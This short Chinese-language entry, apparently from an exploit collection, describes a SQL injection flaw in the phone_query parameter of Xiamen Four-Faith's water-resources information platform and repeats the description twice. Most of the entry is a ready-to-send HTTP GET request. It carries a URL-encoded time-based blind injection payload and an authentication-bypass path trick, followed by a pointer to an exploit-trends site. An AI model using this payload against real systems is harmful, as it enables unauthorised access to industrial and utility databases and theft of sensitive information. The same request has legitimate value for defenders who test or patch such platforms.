Description
厦门四信通信科技有限公司水利信息化平台phone_query参数存在SQL注入漏洞,攻击者可通过该漏洞获取敏感信息。
厦门四信通信科技有限公司水利信息化平台phone_query参数存在SQL注入漏洞,攻击者可通过该漏洞获取敏感信息。
GET /stAlarmSmsSendLog/index.do;userLogin.do;?phone_query=%27%20AND%20(SELECT%209908%20FROM%20(SELECT(SLEEP(6)))Ikoi)--%20Bbt HTTP/1.1
Host:
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.